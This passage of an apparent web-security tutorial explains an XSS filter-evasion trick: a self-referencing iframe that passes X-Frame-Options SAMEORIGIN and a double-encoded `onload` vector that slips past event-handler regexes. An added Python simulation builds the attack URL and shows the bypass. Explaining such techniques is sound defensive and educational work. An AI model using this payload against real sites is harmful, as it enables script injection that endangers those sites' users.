But it’s still easy to flag.
In a generic URL like this:
Where “host” is an IP address or domain, “page” is the vulnerable page and “p” is the vulnerable parameter.
This also works under the “X-Frame-Options: SAMEORIGIN” HTTP security header, because the iframe points back at the same origin: the page calls itself. Notice that we double-encoded the key points of the second vector (the one carried in the iframe src) to evade regex filters that look for event handlers, i.e. “on” followed by a word and an equals sign.
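To make the encoding layers concrete, here is an added Python simulation (not code from the original post) of the two hops this vector goes through. It assumes a naive filter that runs an `on<word>=` regex over the raw, undecoded query string of every request, a vulnerable page that URL-decodes its parameter once and reflects it unescaped, the generic names `page` and `p` from the URL above, and `<svg onload=alert(1)>` as the second vector; all of these are assumptions made for the example. It walks the same chain once with the inner vector double-encoded, as in the text, and once with it single-encoded, to show why the extra layer matters.

```python
import re
from urllib.parse import quote, unquote

# Assumed filter: a naive event-handler regex applied to the raw (undecoded)
# query string of every request the application receives.
EVENT_HANDLER_RE = re.compile(r"on\w+\s*=", re.IGNORECASE)

# The "second vector": what the self-referencing iframe is meant to load.
INNER_VECTOR = "<svg onload=alert(1)>"  # assumed payload for the example


def encode(s, times):
    """Percent-encode every character, `times` layers deep (= -> %3D -> %253D)."""
    for _ in range(times):
        s = quote(s, safe="")
    return s


def build_attack_url(page, param, inner_layers):
    """Attacker-supplied URL. The page reflects an iframe that points back at
    itself (same origin, so X-Frame-Options: SAMEORIGIN is satisfied). The
    inner vector is encoded `inner_layers` times in total, counting the one
    layer every query parameter needs; inner_layers=2 is the double encoding."""
    outer = f'<iframe src="/{page}?{param}={encode(INNER_VECTOR, inner_layers - 1)}">'
    return f"/{page}?{param}={encode(outer, 1)}"


def filter_blocks(raw_url):
    """True if the assumed raw-URL regex filter would reject this request."""
    return EVENT_HANDLER_RE.search(raw_url) is not None


def server_reflects(raw_url):
    """Vulnerable page: decodes the parameter once and echoes it into the HTML."""
    value = raw_url.split("=", 1)[1]
    return unquote(value)


def browser_follows_iframe(html):
    """The browser parses the reflected iframe and requests its src, percent-
    encoding only unsafe characters such as < > " and space, not = or %."""
    src = re.search(r'src="([^"]*)"', html).group(1)
    return quote(src, safe="/?=&%()")


def run(inner_layers, page="page", param="p"):
    """Walk both hops and report what the filter sees and what finally lands."""
    first = build_attack_url(page, param, inner_layers)
    hop1_blocked = filter_blocks(first)
    html1 = server_reflects(first)            # contains the self-calling iframe
    second = browser_follows_iframe(html1)    # the browser's request for its src
    hop2_blocked = filter_blocks(second)
    html2 = server_reflects(second)           # what the framed page reflects
    return {
        "hop1_blocked": hop1_blocked,
        "hop2_blocked": hop2_blocked,
        "executes": html2 == INNER_VECTOR and not (hop1_blocked or hop2_blocked),
    }


if __name__ == "__main__":
    print("attack URL:", build_attack_url("page", "p", 2))
    print("double-encoded inner vector:", run(2))
    print("single-encoded inner vector:", run(1))
```

With the inner vector double-encoded, the first request carries `onload%253D` and the iframe request carries `onload%3D`, so the regex never sees a literal `onload=`, yet the framed page decodes the value to `<svg onload=alert(1)>`. With only one layer, the first hop still passes, but the reflected iframe src contains a literal `onload=` that the browser sends as-is on the second request, and the filter catches it there. Whether a real filter decodes before matching, and whether it inspects the iframe's request at all, depends on where it sits; the simulation only models the raw-URL case assumed above.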
A live example is here (open it in Firefox).
See this cheat sheet for more vectors.
There is also a variation using HTML entities which, although we assume them to be blocked by the filter/WAF, can be used in a slightly different way: